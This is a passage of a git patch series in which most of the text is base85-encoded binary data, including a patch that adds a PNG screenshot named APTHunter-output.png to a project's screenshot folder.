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
I2ga}d4`o1DsQ>@~
literal 0
HcmV?d00001
-- 
2.34.1
From ff566d5f719e398bf8355a0e1dc46a851c6438db Mon Sep 17 00:00:00 2001
From: pex7hfbnt <1584881064@qq.com>
Date: Wed, 16 Oct 2024 23:45:08 +0800
Subject: [PATCH 12/13] ADD file via upload
---
 source/screenshot/APTHunter-output.png | Bin 0 -> 227638 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 source/screenshot/APTHunter-output.png
diff --git a/source/screenshot/APTHunter-output.png b/source/screenshot/APTHunter-output.png new file mode 100644 index 0000000000000000000000000000000000000000..2ce4dd09d7d895ac1a7aed983adee6d78b7070f6 GIT binary patch literal 227638 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 